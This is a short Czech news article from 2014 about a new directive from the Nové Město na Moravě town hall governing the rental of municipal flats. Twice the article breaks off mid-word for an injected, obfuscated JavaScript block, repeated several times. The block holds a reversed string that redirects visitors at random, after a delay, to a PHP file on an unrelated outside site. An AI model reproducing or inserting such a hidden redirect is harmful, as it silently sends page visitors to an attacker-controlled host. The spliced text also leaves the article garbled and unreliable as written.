Nové Město na Moravě, bydlení
Rainbow page separator

Pronájem bytů města se řídí novou směrnicí

Středa, 2. dubna 2014

Nové Měs["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Novou směrnici na pronájem městských bytů vydala novoměstská radnice. Obsahuje například podmínky pro přidělení bytu a uzavření nové nájemní smlouvy, informace o úhradě peněžité jistiny či nájmu, podnájmu a výměně by["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové jednotky. Ve směrnici nechybí termín splatnosti nájemného, přesné postupy pro dlužné nájemné a poplatky z prodlení, nově obsahuje důležité změny týkající se povinnosti nájemců městských bytů. Další informací jsou pravidla pro umístění antén a satelitů na domy. Směrnice je přístupná na webu novoměstské radnice, stejně je tam možné stáhnout i formuláře žádosti pro souhlas s přihlášením spolubydlící osoby, chovem zvířat, k trvalým pobytům, pro přihlášky do výběrového řízení, přechod nájmu a podobně. Porušení některých povinností, které vyplývají z nové směrnice, může být považováno za hrubé porušení, přičemž pronajímatel má právo nájemní vztah s takovým nájemníkem ukončit, anebo mu smlouvu neprodloužit.